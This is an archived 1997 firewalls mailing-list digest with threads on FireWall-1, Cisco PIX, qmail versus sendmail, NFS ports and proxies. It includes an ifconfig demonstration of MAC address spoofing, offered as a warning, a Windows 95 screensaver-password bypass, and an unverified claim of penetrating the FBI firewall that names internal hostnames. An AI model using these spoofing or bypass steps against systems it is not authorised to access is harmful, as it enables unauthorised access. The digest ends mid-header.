firewalls@GreatCircle.COM > Subject: RE: FW-1 hacked? - Reply > Date: luni, ianuarie 13, 1997 09:39 > On Friday, January 10, 1997 11:10 AM, Gabriel Dura[SMTP:dura@geocities.com] wrote: > >There is a guy, working on his own, who claims he knows how to penetrate >FBI's firewall. >As a proof I was told that behind the firewall there is there is another >computer 'phi.fbi.gov'. Just because you can name a hostname behind the firewall is no proof of penetration. A good example is in a "polite" SMTP (also NNTP) transaction, say through a SOCKS server, the host sending the message also sends it's hostname, which means that that the e-mail has an internal hostname in it's header. All this and still no firewall breach (although some may argue that the leakage of internal addresses may constitute some form of compromise - but it's still through no action on the part of an attacker). If I were you, I'd ask for a bit more proof than a flimsy internal hostname... -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner Mon Jan 13 15:12:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA06818 for firewalls-outgoing; Mon, 13 Jan 1997 14:12:13 -0800 (PST) Received: from geocities.com ([204.7.246.133]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA06799 for ; Mon, 13 Jan 1997 14:11:59 -0800 (PST) Received: from 193.230.255.2.flex.ro (dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id OAA13239; Mon, 13 Jan 1997 14:04:27 -0800 (PST) Message-Id: <199701132204.OAA13239@geocities.com> From: "Gabriel Dura" To: "Timothy L Hermans" Cc: Subject: Re: FW-1 hacked? - Reply Date: Mon, 13 Jan 1997 23:34:34 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I understand what you mean but he also pointed out to "ard.fbi.gov" as been the FBI's firewall machine. I checked to see if this site is real and it is - 192.108.246.1 He said that he entered and exited and that he did not retrieved anything. I know him for a long time and I don't think he's the kind of man you said "ie. the idea that hacking the FBI makes everyone think you have big cojones" He has never been in the US and he doesn't know anyone there. Gabriel Dura dura@geocities.com P.S. I never said I'm a firewall expert, I never tried to impress anyone here. I just tried to help. If I would have known everything I wouldn't have needed firewall@GreatCircle.COM. I just want to learn more. I can learn more even from your answers! I don't have others means! Is this wrong? Anyway if there is anyone who wants to know if FW-1 is hacker proof or not why not hook a well configure firewall machine on the Internet and give a prize to the first one who proves that he entered there living a trail inside the machine? You'll have the answer then. ---------- > From: Timothy L Hermans > To: firewalls@GreatCircle.COM > Cc: Gabriel Dura > Subject: Re: FW-1 hacked? - Reply > Date: luni, ianuarie 13, 1997 16:04 > This is the most ridiculous proof I have ever heard. Have you corroborated his story? How? What if I told you that there was a host called "hoover-wears-a-dress.fbi.gov". Would that be proof that I had hacked the FBI? Of course not. You'd have to hack in yourself to see. Looks like you and this "guy" are caught up in hacker-itis (ie. the idea that hacking the FBI makes everyone think you have big cojones). Figure out how to USE FW-1 competently and I'd be much more impressed. On Friday, Jan 10 "Gabriel Dura" wrote: > > There is a guy, working on his own, who claims he knows how to penetrate > FBI's firewall. > As a proof I was told that behind the firewall there is there is another > computer 'phi.fbi.gov'. > > > In the case of me being correctly informed and FBI is using FW-1 you have > an answer. > > > Hope it helps, > Gabriel Dura > dura@geocities.com > > > P.S. I can not guarantee the accuracy of this information and I can not > reveal the person who told me. > > > > ---------- > > From: mike > > To: firewalls@GreatCircle.COM > > Subject: FW-1 hacked? > > Date: miercuri, ianuarie 08, 1997 16:27 > > > > > Hi all > > Does anyone know if FW-1 was ever hacked? > > Tim Hermans FannieMae/MornetPlus Unix Engineering Group From firewalls-owner Mon Jan 13 15:16:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA09315 for firewalls-outgoing; Mon, 13 Jan 1997 14:44:35 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA09273 for ; Mon, 13 Jan 1997 14:44:14 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id RAA07753 for ; Mon, 13 Jan 1997 17:42:32 -0500 Date: Mon, 13 Jan 1997 17:42:32 -0500 (EST) From: Todd Graham Lewis To: Firewalls Mailing List Subject: Ethernet hardware addresses Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This has been pointed out before, but I thought that I'd pass this along to the list to reinforce how worthless ethernet MAC addresses are. Most (virtually all) ethernet cards allow one to reprogram what MAC address it uses. The ioctl under Linux is SIOCSIFHWADDR, for "set hardware address". I was going to write my own program to do it, and while doing research for that, I discovered that it's already built into the standard ifconfig for Linux. (If you want to write your own, just search for SIOCSIFHWADDR in ifconfig.c. The code is really simple; just an ioctl.) To demonstrate how easy this is to do, watch how long it took me: (output edited; these are the commands and the interesting output) reflections# ifconfig eth0 eth0 Link encap:10Mbps Ethernet HWaddr 00:A0:24:81:A7:44 reflections# ifconfig eth0 down reflections# ifconfig eth0 hw ether 00:A0:24:81:A7:45 reflections# ifconfig eth0 eth0 Link encap:10Mbps Ethernet HWaddr 00:A0:24:81:A7:45 Again, if you are using MAC addresses for anything more than _very_ trivial authentication, be aware that any user under virtually any operating system can do what I just did in three commands. If you want real security, use Kerberos or some other appropriate cryptosystem. __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Mon Jan 13 16:46:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA12214 for firewalls-outgoing; Mon, 13 Jan 1997 15:39:22 -0800 (PST) Received: from nt_inet.directs.com (nt-inet.directs.com [156.46.202.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA12196 for ; Mon, 13 Jan 1997 15:39:09 -0800 (PST) From: blitton@directs.com Received: from ccMail by nt_inet.directs.com (IMA Internet Exchange 2.02 Enterprise) id 2DAC6810; Mon, 13 Jan 97 17:34:25 -0600 Mime-Version: 1.0 Date: Mon, 13 Jan 1997 17:41:31 -0600 Message-ID: <2DAC6810.1619@directs.com> Subject: Question To: firewalls@GreatCircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can someone please tell me where I can find a list of port numbers and process assigned to it. ie port 80 => http, port 443 => shttp. I am especially interested in what port number is assigned to snmp. Thanks in advanced and sorry if this is out of topic. bruce From firewalls-owner Mon Jan 13 17:20:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA15407 for firewalls-outgoing; Mon, 13 Jan 1997 16:39:17 -0800 (PST) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA15400 for ; Mon, 13 Jan 1997 16:39:06 -0800 (PST) Received: from matovu_g.ins.com (dal-dynamic241.ins.com [199.0.192.241]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id QAA07354; Mon, 13 Jan 1997 16:38:17 -0800 (PST) Message-Id: <2.2.32.19691231160000.006f57ac@lexicon.ins.com> X-Sender: matovu_g@lexicon.ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 31 Dec 1969 16:00:00 -0800 To: Matthew Howard From: George Matovu Subject: RE: Cisco PIX Cc: Firewalls-Digest@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does the PIX firewall support any session key distribution protocol? In other words, is it possible for the end points in a communication to exchange a new session key for every new session? TIA, George Matovu International Network Services http://www.ins.com At 06:10 PM 1/6/97 -0800, you wrote: >In the mill. The Private Link Encryption card today supports AH/ESP tunnel >mode, with DES (cbc). We need to do some additional testing with client >software. > >matt > >At 05:40 PM 1/6/97 -0500, Larson, Erik wrote: >>I like the PIX in concept and sometimes in practice. I do wish it >>offered client software to allow remote VPN access, however. That >>particular feature is critical in much of the work we do for our >>customer base. >> >>-ekl >> >> >> >>>-----Original Message----- >>>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net] >>>Sent: Sunday, January 05, 1997 11:14 PM >>>To: Firewalls-Digest@GreatCircle.com >>>Subject: Cisco PIX >>> >>>Is there a bastion host / proxy server that out-performs >>>Cisco's PIX in throughput? Security? Ease of implementation? >>>From my limited perspective as a newbie, the Cisco PIX in >>>combination with a good screening router is a very good >>>firewall. Not to be a wise guy, I'm seriously asking, with this >>>technology available, is there ever a reason to build one from >>>scratch? I might be able to do it cheaper - but if it takes a couple >>>weeks or a month to do It might cost more. I'm not in any way >>>affiliated with Cisco. >>>KeithStevens >>>keith@acsinc.net >>> >> >> > > > Matthew Howard > Product Line Manager mhoward@cisco.com > Internet Business Unit 408-526-4720 (voice) > Cisco Systems Inc. 408-527-8122 (fax) > 170 West Tasman Drive > Building VM2 (corner of First & Vista Montana) > San Jose, CA 95134 > > > From firewalls-owner Mon Jan 13 19:13:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19597 for firewalls-outgoing; Mon, 13 Jan 1997 18:07:22 -0800 (PST) Received: from snet ([202.190.59.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA19579 for ; Mon, 13 Jan 1997 18:06:59 -0800 (PST) Received: from palan-net.202.190.59.4 by snet (SMI-8.6/SMI-SVR4) id KAA04804; Tue, 14 Jan 1997 10:14:57 -0800 Message-Id: <3.0.32.19970114103851.00685eb8@202.190.59.4> X-Sender: palan@202.190.59.4 X-Mailer: Windows Eudora Pro Version 3.0 Demo (32) Date: Tue, 14 Jan 1997 10:38:53 -0800 To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU From: PaLaN Subject: !! Quake Site Hacked !! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello ppl, Anybody know, how the hackers manage to hack into Crack dot com and got the source codes for id's Quake 1.01, as well as Crack's newest project, Golgatha, and older games Abuse and Mac Abuse games ?? What are the method of attack they use ? I heard they broke into the Web server and file server to get access ? Anyone can confirm this ? Hmm...I also heard that the hackers, able to get through the Crack's firewall, left intact a bash-history file that recorded all their movements (stupid rite..). They even logged onto IRC's #quake to brag about their exploits !! Wonder what sorta firewall that crack dot com used to protect ? rgds, PaLaN From firewalls-owner Mon Jan 13 19:15:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19494 for firewalls-outgoing; Mon, 13 Jan 1997 18:05:21 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA19485 for ; Mon, 13 Jan 1997 18:05:10 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id VAA16636; Mon, 13 Jan 1997 21:02:11 -0500 From: Adam Shostack Message-Id: <199701140202.VAA16636@homeport.org> Subject: Re: Secure firewall with only Linux-Kernel filtering possible? In-Reply-To: <199701131907.LAA00453@notesgw2.sybase.com> from Ryan Russell/SYBASE at "Jan 13, 97 11:12:27 am" To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE) Date: Mon, 13 Jan 1997 21:02:10 -0500 (EST) Cc: rammeri@winternet.co.at, firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ryan Russell/SYBASE wrote: | How about if someone hacks port 25 via | one of the seemingly endless mail bugs (are | you using sendmail?) so that they now have | control of a machine on your internal net? | | FWIW, I don't know of a good solution to this, | short of being religious about keeping your | mail demon updated and secure. Even if you | have a mail server on the outside or on a DMZ | which forwards to a mail server on the inside, | it's just another hop. I suppose that would make | it somewhat more difficult. qmail. www.qmail.org Adam quick comparison chart: qmail sendmail ----- -------- 210k tar.gz 900k tar.gz many small binaries one huge binary one setuid (qmail) one (root) setuid program designed for security designed to handle complex mail, like uucp/smtp/chaos must be artificially oh-so-quick that it has its own rate slowed to avoid maiming limiting program so it doesn't bring sendmail itself to its knees many small confusing one famously painful config file config files release of the month club bug of the month club (soon to hit v1.0) (no security holes) possible hubris known bad value causes proper paranoia -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Mon Jan 13 20:08:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA20539 for firewalls-outgoing; Mon, 13 Jan 1997 18:29:21 -0800 (PST) Received: from kexin.kexin.co.kr (kexin2.kexin.co.kr [210.126.192.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA20526 for ; Mon, 13 Jan 1997 18:29:10 -0800 (PST) Received: by kexin.kexin.co.kr; id UAA28818; Tue, 14 Jan 1997 20:25:54 +0900 (JST) Message-Id: <199701141125.UAA28818@kexin.kexin.co.kr> Received: from unknown(201.201.1.4) by kexin.kexin.co.kr via smap (V3.1.1) id xma028815; Tue, 14 Jan 97 20:25:38 +0900 From: "Jung Jun Lee" To: "GreatCircle" Subject: Is anybody use streamworks proxy on Gauntlet Date: Tue, 14 Jan 1997 11:30:08 +0900 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-2022-KR Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk $)CI received xdma_gw.c from xingtech. then I compiled xdma_gw.c. when I loaded xdma_gw at command line, bind error on input socket and " address is already used" How can I load xdma_gw ? I tried it with parameter -p 1558 -x 1558 . but failed. From firewalls-owner Mon Jan 13 20:29:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA25478 for firewalls-outgoing; Mon, 13 Jan 1997 20:02:06 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA25468 for ; Mon, 13 Jan 1997 20:01:53 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id XAA09152; Mon, 13 Jan 1997 23:00:18 -0500 Date: Mon, 13 Jan 1997 23:00:17 -0500 (EST) From: Todd Graham Lewis To: "Hicks, Rick" cc: "'Firewalls List'" Subject: RE: LINUX RedHat In-Reply-To: <199701131625.KAA29368@gate.hussmann.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We're running a RedHat-based system here as a packet filter with no problem. One of our proxy servers is also a Linux box, but Debian rather than RedHat. Both work equally well. There are no especial drawbacks, so long as you understand how to use the immutable bit, etc. __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 On Mon, 13 Jan 1997, Hicks, Rick wrote: > > >I would appreciate hearing from anyone who has successfully installed a > >PC-based > >firewall in a LINUX RedHat environment. We have adopted LINUX RedHat > for our > >company and would prefer the TIS FW Toolkit or some other similar > product, > >although I know BSD OS is recommended most often. I recall reading an > EMAIL > >message on this forum sometime back about a person who charges $2,000 to > >install > >TIS FW Toolkit. Perhaps that person has had some experience with RedHat > and > >would like to share his/her knowledge as to what FW would best configure > with > >LINUX RedHat. > > I have been running a 'firewall' on Linux (RedHat) for almost a year now > without any problems. I used parts of the TIS kit and other things: > caching proxy, Real Audio proxy, scan detectors, Tripwire, etc.. > However, I don't think the issue is whether I can run this correctly; > its whether YOU can run this correctly. To be using the TIS toolkit you > should know how to compile and configure programs yourself, and know > about Internet security issues and how each piece of the firewall handles > them. The kit was not intended, and is licensed accordingly, to be > installed by people for money; it is intended to be a kit for security > professionals to use and improve upon. > > If you feel comfortable with your security knowledge and compiling and > configuring programs, then give the kit a try. If you are looking for > someone to setup a firewall for you, you will need to purchase a > commercial firewall. > > > Rick > > ____________________________________________ > Rick Hicks > Network Specialist > Hussmann Corporation > RHicks@Hussmann.com > http://www.hussmann.com > From firewalls-owner Mon Jan 13 21:31:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA29948 for firewalls-outgoing; Mon, 13 Jan 1997 20:52:04 -0800 (PST) Received: from wheaton.wheaton.edu (wheaton.wheaton.edu [192.138.89.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA29919 for ; Mon, 13 Jan 1997 20:51:47 -0800 (PST) Received: from david.wheaton.edu (johnh@david.wheaton.edu [192.138.89.15]) by wheaton.wheaton.edu (8.8.4/wheaton) with SMTP id WAA11414 for ; Mon, 13 Jan 1997 22:54:14 -0600 Date: Mon, 13 Jan 1997 22:57:43 -0600 (CST) From: "John C. Hayward" To: Firewalls@GreatCircle.COM Subject: Privilaged Ports for NFS and Ultrix In-Reply-To: <199701132237.OAA08741@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear Firewallers, I've posted this question to the utrix news group but did not get a reply. I'm hopeing that someone on this list can provide some insight. We have an Ultrix machine which is a NFS server for other machines. We have a security problem in that a rogue user program on the other machines can mount NFS of the server. This can be done by a user level program without any special privilages. Ultrix has a program called nfsportmon in which you can turn on port monitoring for NFS. This restricts NFS activity except to those connections which are on a privilage (512-1023?) port on the client. With NetBSD clients it works just as it should. There is a -P flag on the mount command which only use a privilage port to connect to the server. If Ultrix server has monitoring on NFS activity stops except on those mountings with the -P flag. However with Ultrix and Sun clients there appears to be no flag to tell the client to mount with privilage ports. Further more it appears that once the mount of ultrix clients has been made without port monitoring on turning on port monitoring does not stop NFS activity. Any suggestions on how to get Ultrix Clients to behave properly with nfsportmontoring on? The server is Ultrix 4.4 and the clients are 4.2 and 4.5 Thanks in Advance. John.C.Hayward@wheaton.edu johnh... From firewalls-owner Mon Jan 13 21:37:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA01958 for firewalls-outgoing; Mon, 13 Jan 1997 21:15:02 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA01923 for ; Mon, 13 Jan 1997 21:14:46 -0800 (PST) Received: from sdg.hon.com (galip.vnet.net [166.82.174.200]) by ginger.vnet.net (8.8.4/8.8.2) with SMTP id AAA23641 for ; Tue, 14 Jan 1997 00:15:13 -0500 (EST) Received: from galip.hon.com (galip.hon.com [166.82.174.200]) by sdg.hon.com (NTMail 3.02.10) with ESMTP id ca000002 for ; Tue, 14 Jan 1997 00:10:41 -0500 Message-ID: <32DB154C.50F1@hon.com> Date: Tue, 14 Jan 1997 00:10:36 -0500 From: "Steve@hon.com" Reply-To: Steve@hon.com Organization: My Organization X-Mailer: Mozilla 3.0Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com CC: blitton@directs.com Subject: Re: Question References: <2DAC6810.1619@directs.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Info: Evaluation version at sdg.hon.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk blitton@directs.com wrote: > > Can someone please tell me where I can find a list of port numbers and > process assigned to it. ie port 80 => http, port 443 => shttp. > > I am especially interested in what port number is assigned to snmp. > > Thanks in advanced and sorry if this is out of topic. > > bruce Bruce, Posts that do not have the word firewall in at least one paragraph is off topic ;) If you are running NT (Win95?), look in \winnt\system32\drivers\etc for the file 'services'. It lists port numbers and associated services. Not sure about the location for *nix, os/2, BSD etc..but a search should find it if you have tcp/ip installed. Steve Steve@hon.com Steve From firewalls-owner Mon Jan 13 22:56:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA03846 for firewalls-outgoing; Mon, 13 Jan 1997 21:52:35 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA03828 for ; Mon, 13 Jan 1997 21:52:13 -0800 (PST) Received: from sdg.hon.com (galip.vnet.net [166.82.174.200]) by ginger.vnet.net (8.8.4/8.8.2) with SMTP id AAA23991 for ; Tue, 14 Jan 1997 00:52:48 -0500 (EST) Received: from galip.hon.com (galip.hon.com [166.82.174.200]) by sdg.hon.com (NTMail 3.02.10) with ESMTP id ea000004 for ; Tue, 14 Jan 1997 00:48:12 -0500 Message-ID: <32DB1E19.4055@vnet.net> Date: Tue, 14 Jan 1997 00:48:09 -0500 From: "Steve@hon.com" Reply-To: Steve@hon.com Organization: My Organization X-Mailer: Mozilla 3.0Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: SOCKS for Firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Info: Evaluation version at sdg.hon.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I have been looking at NEC's SOCKS server program for possible use as a firewall on a small LAN. All IP's on the LAN are in the 192.168.0.0 network address which I think I read somewhere were invisible to the Internet. Could someone advise me on its' use under these circumstances? I am running NT 4.0 as server and several wfw clients. Thanks, galip@vnet.net From firewalls-owner Mon Jan 13 22:59:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA05256 for firewalls-outgoing; Mon, 13 Jan 1997 22:24:56 -0800 (PST) Received: from snet ([202.190.59.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id WAA05249 for ; Mon, 13 Jan 1997 22:24:40 -0800 (PST) Received: from palan-net.202.190.59.4 by snet (SMI-8.6/SMI-SVR4) id OAA01327; Tue, 14 Jan 1997 14:32:36 -0800 Message-Id: <3.0.32.19970114145623.006882b0@202.190.59.4> X-Sender: palan@202.190.59.4 X-Mailer: Windows Eudora Pro Version 3.0 Demo (32) Date: Tue, 14 Jan 1997 14:56:24 -0800 To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU From: PaLaN Subject: WIN'95 FLAW Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends. It works.....try on your own PC. Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here ok..! Let me know if anyone of you encountered this. I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 00:11:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA10015 for firewalls-outgoing; Mon, 13 Jan 1997 23:43:36 -0800 (PST) Received: from tymix.Tymnet.COM (tymix.tymnet.com [131.146.2.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA09972 for ; Mon, 13 Jan 1997 23:42:57 -0800 (PST) Received: by tymix.Tymnet.COM (4.1/SMI-4.1) id AA12203; Mon, 13 Jan 97 23:43:18 PST Received: from delta by tymix.Tymnet.COM (in.smtpd); 13 Jan 0 23:43:17 PDT Received: by delta.tymnet.com (4.1/SMI-4.1) id AA24620; Mon, 13 Jan 97 23:42:41 PST From: dtosic@delta.Tymnet.COM (Dragan Tosic) Message-Id: <9701140742.AA24620@delta.tymnet.com> Subject: Re: Question To: blitton@directs.com Date: Mon, 13 Jan 1997 23:42:40 -0800 (PST) Cc: firewalls@greatcircle.com In-Reply-To: <2DAC6810.1619@directs.com> from "blitton@directs.com" at Jan 13, 97 05:41:31 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Can someone please tell me where I can find a list of port numbers and > process assigned to it. ie port 80 => http, port 443 => shttp. > Hi there, yes I can tell you :-) Point your favourite browser to : ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers Hope this helps D.B.Tosic Germany > I am especially interested in what port number is assigned to snmp. > > Thanks in advanced and sorry if this is out of topic. > > bruce > From firewalls-owner Tue Jan 14 03:20:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA22107 for firewalls-outgoing; Tue, 14 Jan 1997 01:49:36 -0800 (PST) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id BAA22074 for ; Tue, 14 Jan 1997 01:48:47 -0800 (PST) Received: from pamela.sic.se (pamela [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id KAA05949 for ; Tue, 14 Jan 1997 10:48:17 +0100 (MET) X-Mailer: InterCon TCP/Connect II 2.3.1 MIME-Version: 1.0 Message-Id: <9701141050.AA25310@pamela.sic.se> Date: Tue, 14 Jan 1997 10:50:25 +0100 From: "Stefan Berg" To: firewalls@GreatCircle.com Subject: POP Proxy? Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, am looking for a nice little POP proxy that does just about the same thing as the fwtk FTP-proxy: Users should be able to check mail outside my proxy, by using ie. mailuser@mailhost.com Could someone point me in the right direction? Best regards, /Stefan From firewalls-owner Tue Jan 14 05:20:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA26800 for firewalls-outgoing; Tue, 14 Jan 1997 04:20:47 -0800 (PST) Received: from goya.eunet.es (goya.eunet.es [193.127.1.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA26747 for ; Tue, 14 Jan 1997 04:19:33 -0800 (PST) Received: (uucp@localhost) by goya.eunet.es (8.8.4/13.42) id NAA00192 for greatcircle.com!firewalls; Tue, 14 Jan 1997 13:03:18 +0100 (MET) Received: from hydra.crisa.es by nova.crisa.es (SMI-8.6/5.3) with r id MAA04981 for ; Tue, 14 Jan 1997 12:21:28 +0100 Received: by hydra.crisa.es (SMI-8.6/SMI-SVR4) id MAA08544; Tue, 14 Jan 1997 12:17:20 +0100 Date: Tue, 14 Jan 1997 12:17:20 +0100 From: plavin@crisa.es (Pilar Lavin Mera) Message-Id: <199701141117.MAA08544@hydra.crisa.es> To: firewalls@greatcircle.com Subject: TIS FWtk + netscape X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all, I'm new in this class of list and i don't know if my question is or not appropiated, but ... i would appreciate any help. My company has a network acceeding to internet through a SUN Sparc Station + Solaris 2.3 and we have installed the TIS FWtoolkit. Our problem is that we cannot configure netscape to pass through the ftp-proxy. Can anyone help us? Thanks in advance, Pilar. plavin@crisa.es From firewalls-owner Tue Jan 14 05:31:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA26806 for firewalls-outgoing; Tue, 14 Jan 1997 04:21:11 -0800 (PST) Received: from goya.eunet.es (goya.eunet.es [193.127.1.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA26764 for ; Tue, 14 Jan 1997 04:20:07 -0800 (PST) Received: (uucp@localhost) by goya.eunet.es (8.8.4/13.42) id NAA00160 for GreatCircle.COM!firewalls-digest; Tue, 14 Jan 1997 13:02:02 +0100 (MET) Received: from hydra.crisa.es by nova.crisa.es (SMI-8.6/5.3) with r id LAA04865 for ; Tue, 14 Jan 1997 11:59:48 +0100 Received: by hydra.crisa.es (SMI-8.6/SMI-SVR4) id LAA08506; Tue, 14 Jan 1997 11:55:38 +0100 Date: Tue, 14 Jan 1997 11:55:38 +0100 From: plavin@crisa.es (Pilar Lavin Mera) Message-Id: <199701141055.LAA08506@hydra.crisa.es> To: firewalls-digest@GreatCircle.COM Subject: TIS FWtk + netscape X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all, I'm new in this class of list and i don't know if my question is or not appropiated, but ... i would appreciate any help. My company has a network acceeding to internet through a SUN Sparc Station + Solaris 2.3 and we have installed the TIS FWtoolkit. Our problem is that we cannot configure netscape to pass through the ftp-proxy. Can anyone help us? Thanks in advance Pilar. plavin@crisa.e s From firewalls-owner Tue Jan 14 05:44:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26063 for firewalls-outgoing; Tue, 14 Jan 1997 03:34:46 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id DAA26044 for ; Tue, 14 Jan 1997 03:34:15 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id DAA20239; Tue, 14 Jan 1997 03:34:04 -0800 (PST) Message-Id: <3.0.32.19970114063402.006eb0c8@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Tue, 14 Jan 1997 06:34:05 -0500 To: blitton@directs.com From: Paul Ferguson Subject: Re: Question Cc: 